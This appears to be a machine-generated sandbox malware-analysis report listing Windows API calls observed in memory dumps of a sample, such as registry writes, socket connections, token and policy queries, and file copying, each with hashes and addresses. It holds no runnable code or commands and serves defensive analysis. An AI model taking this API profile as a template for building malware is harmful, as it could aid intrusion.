                                                                      • Opcode Fuzzy Hash: b12a611b4489d4efb89c77cd8b439ba5d6f694fd685b026bb3a30f6d443a190b
                                                                      • Instruction Fuzzy Hash: 8131D67140D3C06FD7038B758C55B62BFB4EF87610F1985DBD9848F1A3D225A909CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0529146E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 38c09484d695839ffe99445355badde929692aebfa669468d8d558a0506631c3
                                                                      • Instruction ID: be53caf005b0d352ce71c055d2b095344394f81e821bec9e98e22b9bf5829355
                                                                      • Opcode Fuzzy Hash: 38c09484d695839ffe99445355badde929692aebfa669468d8d558a0506631c3
                                                                      • Instruction Fuzzy Hash: 9031A0715093C06FD3138B259C51F62BFB8EF87610F1A81DBE8848B563D264A909C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0529532A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295144
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      APIs
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293077
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterInfo
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052912AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292F85
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293840
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 05290575
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293741
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFBD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290091
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529355F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 02AFB8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      APIs
                                                                      • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05292215
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ExtentPoint32Text
                                                                      APIs
                                                                      • CopyFileW.KERNEL32(?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294F6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 02AFBCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295046
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052902E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290FE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 052944DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 02AFABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: ad29a025f8273f18f3a3e7d4a7fb0eb77fae0bdaa66403df2c5f64824ed1a88f
                                                                      • Instruction ID: 168bd9bdd3c9c538024995a47c242e6de9a9f062f3646c646cd06e55e6df4f8d
                                                                      • Opcode Fuzzy Hash: ad29a025f8273f18f3a3e7d4a7fb0eb77fae0bdaa66403df2c5f64824ed1a88f
                                                                      • Instruction Fuzzy Hash: C4219D72500704AFE721DB65CC85FABFBECEF04710F14855BFE459A242DA64A8098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293936
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 294f3d4e36c5676ba4bb20824373a2e775e80b92128712e88ddd5dfe4277a2c0
                                                                      • Instruction ID: 5d93de58fcfe2515aab187163a8f8eae2fd2bf668f0a53cfe38acc523a3cf179
                                                                      • Opcode Fuzzy Hash: 294f3d4e36c5676ba4bb20824373a2e775e80b92128712e88ddd5dfe4277a2c0
                                                                      • Instruction Fuzzy Hash: 8A219D72500204AFFB20DF25DC85F6BFBA8EF54720F14896AEE859B241D674A8088A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 052909F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 9a78f0eca3894180d1fb423b52f2441f26ec2a585886f1ec7504147c4ed1bf8f
                                                                      • Instruction ID: cbcf89d0b488038c1843c7ea81e1a00786f5b60a650327aec3d6bdda4a4573e4
                                                                      • Opcode Fuzzy Hash: 9a78f0eca3894180d1fb423b52f2441f26ec2a585886f1ec7504147c4ed1bf8f
                                                                      • Instruction Fuzzy Hash: 7321AC71500204AFFB24DF65C889F66FBE8EF04610F14846AEE499B342D671E804CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293479
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: d5e4e1e2cb71d6713108179072b11c0fb31f23032c83b1b090558fd2fffaf7b0
                                                                      • Instruction ID: e68f68efa64705a4a36db0e9228c5be818f906c4d2ac3d4a264fe44780888ac8
                                                                      • Opcode Fuzzy Hash: d5e4e1e2cb71d6713108179072b11c0fb31f23032c83b1b090558fd2fffaf7b0
                                                                      • Instruction Fuzzy Hash: 24218EB5500604AFEB21CF55CC84FABFBE8EF14710F14896AEE4A8B251D675E809CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 02AFB38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: 892ed21dfdb1574afe71c220379b980069974b9e61baa983b5a48661d2efe6c9
                                                                      • Instruction ID: 3f6f63a411dab11fe62f58963d9e7c60690b5eb93101b6c1cbae05d057f6d00a
                                                                      • Opcode Fuzzy Hash: 892ed21dfdb1574afe71c220379b980069974b9e61baa983b5a48661d2efe6c9
                                                                      • Instruction Fuzzy Hash: 14218E72540304AFEB20DF69DC85F6AFBACEF48710F14896AFE459A641D674A4088B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052910BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 36f469eeb1edae57798042c9d39596d773988e8208b5b61d78095c5e7ee8f664
                                                                      • Instruction ID: 972e0f885179c2ca07f04686039bbb8138130d973eac5a813772a3c3f7e5687a
                                                                      • Opcode Fuzzy Hash: 36f469eeb1edae57798042c9d39596d773988e8208b5b61d78095c5e7ee8f664
                                                                      • Instruction Fuzzy Hash: FD21A471409384AFDB12CF65DC45F67FFB8EF46310F0884ABEA849B252C275A504C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFB06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: 9147c8fa6f6f9d990f0891efafeda51e1a87e9b1cff7c5a41034d8b6123346d0
                                                                      • Instruction ID: 9f3ca653ce71085dcf38e1cca95a0f3de5ab23a3517b96acbff3853c23fb7477
                                                                      • Opcode Fuzzy Hash: 9147c8fa6f6f9d990f0891efafeda51e1a87e9b1cff7c5a41034d8b6123346d0
                                                                      • Instruction Fuzzy Hash: 3C11CD71500204AFEB21CF65DC80FABBBACEF08324F14886BEE45DB651DA74A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 7df04ed3d09029ba31b2b28e33741c2afa10c59ff054382e85bb3921a6cbdf20
                                                                      • Instruction ID: 03f1d9aeff40900a5825f262387abc8925adb6b4c707545f684df35ae3511334
                                                                      • Opcode Fuzzy Hash: 7df04ed3d09029ba31b2b28e33741c2afa10c59ff054382e85bb3921a6cbdf20
                                                                      • Instruction Fuzzy Hash: 8A218E76600604AFE760CF95CC80FA7FBECEF04710F14846AEA499B252DB64E409CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 05290575
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: 21ef14b6d5f43d15c788e9d8c44d7bda127378da91a2f762dddabab459000576
                                                                      • Instruction ID: d2364a9d1f1a29e00460621f2804d497f83c37cc08b7d3af3afb6c61a4f49eca
                                                                      • Opcode Fuzzy Hash: 21ef14b6d5f43d15c788e9d8c44d7bda127378da91a2f762dddabab459000576
                                                                      • Instruction Fuzzy Hash: 03219DB1900204EFEB24DB65CC49F66FBE8EF44620F14846AED898B341D6B5A804CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 92dfe93a5676a380f5ed1225aa2e0f985b56daca6ce2e3d51ddbe3b43c983b17
                                                                      • Instruction ID: 4f3b8fc8439d9e4254ef4efb18fa28fe1335f525ec63a690e45671dfc7327451
                                                                      • Opcode Fuzzy Hash: 92dfe93a5676a380f5ed1225aa2e0f985b56daca6ce2e3d51ddbe3b43c983b17
                                                                      • Instruction Fuzzy Hash: FE21AE70500200AFEB20DF25DC85FA6FBE8EF04720F14846AED889B341D7B1A908CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 052956C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: baf31862861de75c76cabe7f6efc16b03e89441d71485730a9d77e9eff328f5b
                                                                      • Instruction ID: 2263e00985da0cf147080b8f10a0f3c8b73c7b429e2a73ed61f038e52f56e91f
                                                                      • Opcode Fuzzy Hash: baf31862861de75c76cabe7f6efc16b03e89441d71485730a9d77e9eff328f5b
                                                                      • Instruction Fuzzy Hash: 1321D1765093C0AFDB128F25DC40A62FFB4EF07210F0884DEED858F263D265A808DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529521E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 19e0217b1dc9f814e38c78571c56eeba1ed1f4c894ec7276bee7bd84ff6729f3
                                                                      • Instruction ID: 1beb9a5f54006b4002f5b7264ef827c2a4eada3b2e147e7a7d9ffc7a4a3cadf2
                                                                      • Opcode Fuzzy Hash: 19e0217b1dc9f814e38c78571c56eeba1ed1f4c894ec7276bee7bd84ff6729f3
                                                                      • Instruction Fuzzy Hash: 82119D71A04204AFEB21CB25DC85F6AFBE8EF45710F14846BEE498B251D6A0A8088A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05293E4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      • Opcode ID: 1400b2618fac32a9b0f200696c858f7921dafac88e532d2be4837a1974222d03
                                                                      • Instruction ID: 359aba70303241fc7626a6b78a57a81c054171761bc9d2d2737b9f09cdf4b477
                                                                      • Opcode Fuzzy Hash: 1400b2618fac32a9b0f200696c858f7921dafac88e532d2be4837a1974222d03
                                                                      • Instruction Fuzzy Hash: E3216F71409384AFDB22CF65DC44B62FFF4EF46210F18859EED898B262D375A818DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 191e7fec6ccc53cfff8856ceb3c7b41054612b4ff07355309809c8018d64345f
                                                                      • Instruction ID: 23c5ba1d84cc21ca74f89d87b2dbb22157ae505cb89b8f448f2d0e0ab9a8e3a9
                                                                      • Opcode Fuzzy Hash: 191e7fec6ccc53cfff8856ceb3c7b41054612b4ff07355309809c8018d64345f
                                                                      • Instruction Fuzzy Hash: FA21DE71500344AFEB21CF15CC88FA6FBE8EF48320F14845EEA889B251D3B1A408CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 02AFB8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 0e6225c5f32c170156a59ce98f10d8875caa046d3baf16f12bc488ccd17107d2
                                                                      • Instruction ID: 1aafb723edb9cd23a674fb9be76e119f864cf2b56aee6906316ad7b40bb4917f
                                                                      • Opcode Fuzzy Hash: 0e6225c5f32c170156a59ce98f10d8875caa046d3baf16f12bc488ccd17107d2
                                                                      • Instruction Fuzzy Hash: A821BE71500200AFEB21CFA5D885B56FFE8EF48310F14895EEE858A251C7B5A408CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 05293635
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: cf24a775497ae9e39422f220c3a7f5d62fd05e2089afd70980e480bcef88dfb9
                                                                      • Instruction ID: 306c9a92689d3d3e8913c7f6e0a44b88c14fc390053bfa05b25fc6a45b429933
                                                                      • Opcode Fuzzy Hash: cf24a775497ae9e39422f220c3a7f5d62fd05e2089afd70980e480bcef88dfb9
                                                                      • Instruction Fuzzy Hash: BE119071500244AFEB10DF25DC85F6BFF9CEF44720F14886BEE449B341D6B4A9098A75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293840
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: 2314f70d1c11c787ae7a5c574d700b4946cab83e50fee11afb05debde5fdb7e6
                                                                      • Instruction ID: 9171c10f8c3fbda73921dde7f2e2a7e99aac590b7046a9d5e32cb591a209a072
                                                                      • Opcode Fuzzy Hash: 2314f70d1c11c787ae7a5c574d700b4946cab83e50fee11afb05debde5fdb7e6
                                                                      • Instruction Fuzzy Hash: 2011B171400204AFEB21CF55DC44FA7FBACEF55310F14896BEA459B211D674A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05291AE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: a2970d9db6f21bb1fe9daa02ec3b67b8c73e7676621a280518b26245c384c89a
                                                                      • Instruction ID: aae44a2677a3b3e3e450397e128c46c8119e34104484ffb249acb2046a266cc9
                                                                      • Opcode Fuzzy Hash: a2970d9db6f21bb1fe9daa02ec3b67b8c73e7676621a280518b26245c384c89a
                                                                      • Instruction Fuzzy Hash: 582193755093856FDB22CE25DC45B62BFE8FF46610F08808AED858B253D265E918C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052902E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: b68010e8adc736d1f8f4de2f4ac3044f85d05de4a559f46bca8ff7005460a9e9
                                                                      • Instruction ID: 6e896311a14a191f5b37ca760733c9db194cfb7d30bbd0964f8559ed63f38ea6
                                                                      • Opcode Fuzzy Hash: b68010e8adc736d1f8f4de2f4ac3044f85d05de4a559f46bca8ff7005460a9e9
                                                                      • Instruction Fuzzy Hash: 65117C72900608AFEB20CF65CC85F67FBE8EF09710F14856AEA499B351D6A4E408CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295144
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: faa5b23da939670cb1d39c9d2eba032f5809bec2a8f3b50859bdbf5b69da049f
                                                                      • Instruction ID: 36c9ec598af049eb6ac71224924f96a452271223e73cfb7ca25cae99ccd81b94
                                                                      • Opcode Fuzzy Hash: faa5b23da939670cb1d39c9d2eba032f5809bec2a8f3b50859bdbf5b69da049f
                                                                      • Instruction Fuzzy Hash: 35118E72610600AFEB21CE25CC81F67FBA8EF05710F14855AEE4A9B351E6B4E409CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: c5a1c3b54974753f4372a67132b8db3d7ac0bf1d4e59ffc59016657f6c47e317
                                                                      • Instruction ID: a08ea2aa7c497ca18b629739caa03205f44b7faaa9cc2c80961eec41b5e5f303
                                                                      • Opcode Fuzzy Hash: c5a1c3b54974753f4372a67132b8db3d7ac0bf1d4e59ffc59016657f6c47e317
                                                                      • Instruction Fuzzy Hash: 8E11D072500204AFEB21CF65DC45F6BFBE8EF45320F14846BEE499B251C6B1A4058BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295046
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: bb55a9c6d505941c3250207eac54b94770427fb782a8c622b57a23600c751b87
                                                                      • Instruction ID: 67a8c1424d57cf1a86809e226beeb1c4d4f40adafd88b97f741ccfb812542fb2
                                                                      • Opcode Fuzzy Hash: bb55a9c6d505941c3250207eac54b94770427fb782a8c622b57a23600c751b87
                                                                      • Instruction Fuzzy Hash: E611B271600600AFEB21CF65DC85F67FBA8EF45720F14846BEE499B251D6B5A4048BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052912AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: de3f6a1b28e8e85d82751ab8229a1e074a4da11024505120afbeaf398e2ec16e
                                                                      • Instruction ID: 3cfca6e38b082df40b496f124cfab6e0207552f6c2e22b7beb7c31acd44f8153
                                                                      • Opcode Fuzzy Hash: de3f6a1b28e8e85d82751ab8229a1e074a4da11024505120afbeaf398e2ec16e
                                                                      • Instruction Fuzzy Hash: 02119071800204AFEB11DB65DC84FA7FBACEF45320F14846BEA49DB241D674A504CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290FE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction ID: ccfc3177e050f17a08ffca8b32079b8bc455e01c4e67bc0b068c514cad6784e6
                                                                      • Opcode Fuzzy Hash: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction Fuzzy Hash: FA11BF71500204AFEB20CF25DC85FA7FBE8EF44720F1484ABEE499B241D6B5A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA6CC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
